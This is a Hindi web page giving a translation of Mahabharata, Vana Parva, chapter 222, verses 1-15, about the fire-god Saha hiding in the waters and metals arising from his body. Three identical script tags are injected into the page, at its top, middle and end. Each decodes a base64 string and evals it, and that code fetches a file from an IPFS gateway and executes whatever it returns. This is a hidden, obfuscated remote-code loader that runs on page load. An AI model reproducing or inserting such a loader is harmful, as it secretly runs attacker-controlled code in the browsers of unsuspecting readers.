महाभारत वन पर्व अध्याय 222 श्लोक 1-15

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

द्वाविंशत्‍यधिकद्विशततम (222) अध्‍याय: वन पर्व (मार्कण्‍डेयसमस्‍या पर्व )

महाभारत: वन पर्व: द्वाविंशत्‍यधिकद्विशततम अध्‍याय: श्लोक 1-15 का हिन्दी अनुवाद
सह नामक अग्रि का जल में प्रवेश और अथवा अग्डि़रा द्वारा पुन: उनका प्राकटथ

मार्कण्‍डेयजी कहते हैं-राजन् । जल में निवास के कारण प्रसिद्ध हुए ‘सह’ नामक अग्रि के एक परम प्रिय पत्‍नी थी जिसका नाम था मुदिता । उसके गर्भ से भूलोक और भुवलोंक के स्‍वामी सहने ‘अभ्‍दुत’ नामक उत्‍कृष्‍ट अग्रि को उत्‍पन्न किया । ब्राह्मण लोगों में वंश परम्‍परा के क्रम से सभी यह मानते और कहते हैं कि ‘अभ्‍दुत’ नामक अग्रि सम्‍पूर्ण भूतों के अधिपति हैं। वे ही सबके आत्‍मा और भुवन-भर्ता हैं । ‘वे ही इस जगत् के सम्‍पूर्ण महाभुतों के पति हैं। उनमें सम्‍पूर्ण ऐश्‍वर्य सुशोभित हैं। वे महातेजस्‍वी अग्रि देव सदा सर्वत्र विचरण करते हैं । ‘जो अग्रि ग्रहपति नाम से सदा यज्ञ में पूजित होते हैं तथा हवन किये गये हविष्‍य को देवताओं के पास पहुंचाते हैं, वे अभ्‍दुत अग्रि ही इस जगत् को पवित्र करने वाले हैं । ‘जो ‘आप’ नामवाले सह के पुत्र हैं, जो महाभाग, सत्‍व भोक्ता, भुलोक के पालक और भुवलोंक के स्‍वामी हैं, वे अभ्‍दुत नामक महान् अग्रि बुद्धितत्‍व के अधिपति बताये जाते हैं’ । ‘उन्‍हीं ‘अभ्‍दुत’ या ग्रहपति के एक अग्रि स्‍वरुप पुत्र उत्‍पन्न हुआ, जिसका नाम ‘भरत’ है। ये मरे हुए प्राणियों के शव का दाह करते हैं। भरत का अग्रिष्‍टोम यज्ञ में नित्‍य निवास है, इसलिये उन्‍हें ‘नियत’ भी कहते हैं। नियत का संकल्‍प उत्तम है । ‘प्रथम अग्रि ‘सह’ बड़े प्रभावशाली हैं। एक समय देवता लोग उनको ढूंढं रहे थे । उनके साथ अपने पौत्र नियत को भी आता देख ( उससे छू जाने के ) भय से वे समुद्र के भीतर घुस गये । तब देवता लोग सब दिशाओं में उनकी खोज करते हुए वहां भी पहंचने लगे । एक दिन अथर्वा (अग्डि़रा) को देखकर अग्रि ने उन से कहा । ‘वीर । तुम देवताओं के पास उनका हविष्‍य पहंचाओ । मैं अत्‍यन्‍त दुर्बल हो गया हूं। अब केवल तुम्‍हीं अग्रि पद पर प्रतिष्ठित हो जाओ और मेरा यह प्रिय कार्य सम्‍पन्न करो । इस प्रकार अथर्वा को भेजकर अग्रि देव दूसरे स्‍थान में चले गये। किंतु मत्‍स्‍यों अथर्वा से उनकी स्थिति कहां है, यह बता दिया। इससे कुपित होकर अग्रि ने उन्‍हें शाप देते हुए कहा-‘तुम लोग नाना प्रकार के जीवों के भक्ष्‍य बनोगे’ । तदनन्‍तर अग्रि ने अथर्वा से फिर वही बात कही उस समय देवताओं के कहने से अथर्वा मुनि ने सह नामक अग्रि देव से अत्‍यन्‍त अनुनय-विनय की; परंतु उन्‍होंने न तो हविष्‍य ढोने का भार लेने की इच्‍छा की और न वे अपने उस जीर्ण शरीर का ही भार सह सके । अन्‍ततोगत्‍वा उन्‍होंने शरीर त्‍याग दिया । उस समय अपने शरीर को त्‍यागकर वे धरती में समा गये। भुमि का स्‍पर्श करके उन्‍होंने पृथक-पृथक बहुत से धातुओं की सृष्टि की । ‘सह’ नामक अग्रि ने अपने पीब तथा रक्त से गन्‍धक एवं तैजस धातुओं को उत्पन्न किया। उनकी हड्डियों से देवदारु के वृक्ष प्रकट हुए। कफ से स्‍फटिक तथा पित्त से मरकत मणि का प्रादुर्भाव हुआ । और उनका यकृत ( जिगर ) ही काले रंग का लोहा बनकर प्रकट हुआ। काष्‍ठ, पाषाण और लोहा-इन तीनों से ही प्रजाजनों की शोभा होती है। उनके नख मेघ समूह का रुप धारण करते हैं। नाडियां मूंगा बनकर प्रकट हुई हैं ।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>